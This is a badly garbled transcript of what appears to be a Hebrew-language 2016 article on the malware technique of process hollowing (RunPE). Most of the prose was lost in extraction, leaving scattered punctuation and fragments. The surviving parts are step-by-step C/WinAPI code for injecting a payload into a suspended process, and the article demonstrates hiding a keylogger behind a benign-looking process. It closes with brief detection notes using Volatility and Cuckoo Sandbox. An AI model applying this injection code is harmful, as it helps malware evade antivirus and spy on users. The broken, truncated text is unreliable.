Process Hollowing

Click here to load reader

  • date post

    11-Apr-2022
  • Category

    Documents

  • view

    0
  • download

    0

Embed Size (px)

Transcript of Process Hollowing


Dynamic Forking.- RunPE- Process Hollowing
, , ,
. ,
Process Hollowing ,
, " "
. Antivirus-

,
. .
?
- ,
. 1 l i-
- ,
. / Antivirus
. " Process hollowing
)( . notepad
, ) suspended mode-
, - (,
.
Process Hollowing
2 2016 , 77
"" ,
.
: ,
EXE 32 )
( 64 32
BaseAddresss .
subsystem ( -console)
API suspended ,
CREATE_SUSPENDED dwCreationFlags , CreateProcess
:
NULL, pStartupinfo, &process_info))
process_info handle- -primary thread ,
.
, . suspended- ,
: CreateFile
HANDLE mProc = CreateFile(argv[2], GENERIC_READ, FILE_SHARE_READ, NULL,
OPEN_EXISTING, 0, NULL);
. handle
Process Hollowing
:
DWORD nSizeOfFile = GetFileSize(mProc, NULL);
)
: VirtualAlloc , (
PVOID image = VirtualAlloc(NULL, nSizeOfFile, MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
. image.
:ReadFile (, )
ReadFile(mProc, image, nSizeOfFile, &read, NULL);
ReadFile handle , , buffer
(. buffer-)
:
TerminateProcess(mProc, 1);
:-header- ,
pidh = (PIMAGE_DOS_HEADER)image;
:Nt headers- offset- e_lfanew-
pinh = (PIMAGE_NT_HEADERS)((LPBYTE)image + pidh->e_lfanew);
"?context " ,
- , structure context-
context context switching ( ) , thread
. -
, thread- "
- context- - , Entry Point- EAX-
base address :
CONTEXT ctx;
. NTDLL.dll- native API context-
hThread handle -primary thread , -ctx -context .
:
NtGetContextThread(process_info.hThread, &ctx);
PEB-
PEB (Process Environment Block)- ,
. HEAP ,,BaseAddress- , ,
-PEB EBX suspended!
native API PEB- bytes 8 BaseAddress-
NtReadVirtualMemory
sizeof(PVOID), NULL);
Buffer , , handle
.
. BaseAddress- base-
Process Hollowing
5 2016 , 77

-header- , BaseAddress-
: ,
if ((DWORD)base == pinh->OptionalHeader.ImageBase)
Address: %#x\n", base);
. UNMAP
- . , ,
VirtualAllocEx: .
PVOID mem = VirtualAllocEx(process_info.hProcess, (PVOID)pinh-
>OptionalHeader.ImageBase, pinh->OptionalHeader.SizeOfImage, MEM_COMMIT |
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
, BaseAddress-
. MEM_COMMIT | MEM_RESERVE-
Process Hollowing

? ! ( hollow)
.-section- -header- ,
', :
?
. section table + -header- SizeOfHeaders
: section- offset-
NtWriteVirtualMemory(process_info.hProcess, mem, image,
pinh->OptionalHeader.SizeOfHeaders, NULL);
NtWriteVirtualMemory (mem-
) )image - (
.SizeOfHeaders
. -section- , -header-
NumberOfSections- ) -section- for
"" section , ( File Header-
Process Hollowing
7 2016 , 77
section + section header- :
.
? :
for (int i = 0; i<pinh->FileHeader.NumberOfSections; i++)
{
VirtualAddress ( ) .
PointerToRawData .
SizeOfRawData .

... " " ,
Entry- EAX- ( )
Point , .
.. :.
ctx.Eax = (DWORD)((LPBYTE)mem + pinh->OptionalHeader.AddressOfEntryPoint);
: BaseAddress- ,
NtWriteVirtualMemory(process_info.hProcess, (PVOID)(ctx.Ebx + 8),
NtSetContextThread(process_info.hThread, &ctx);
Process Hollowing
NtResumeThread(process_info.hThread, NULL);
: -
VirtualFree(image, 0, MEM_RELEASE);
! - ,
... ,
Process Hollowing

", " Hello World "
. : KeyLogger
:
:Hello World- TaskManager-
:Sysinternals procexp.exe ,
... Hello World- KeyLogger-
Process Hollowing
00 2016 , 77

BBSRAT- Roaming Tiger
ssonsvr.exe , Spear Phishing- .
pnipcn.dll DLL-side loading citrix
aclmain.sdb suspended msiexec.exe Instance
.
?Process Hollowing
.
, -header- 90% -
. -"
-section- volatility plugin malfind
) PAGE_EXECUTE_READWRITE Section
malware , VirtualProtectEx
Read-only ,)Section . .
Cuckoo Sandbox API -Process Hollowing .
Process Hollowing


, .
-.
( ) ,
(Cuckoo Sandbox.)

. , 21 ,

http://journeyintoir.blogspot.co.il/2015/02/process-hollowing-meets-cuckoo-sandbox.html -
BBSRAT
http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-
organizations-linked-to-roaming-tiger/
http://marcoramilli.blogspot.co.il/2010/12/windows-pe-header.html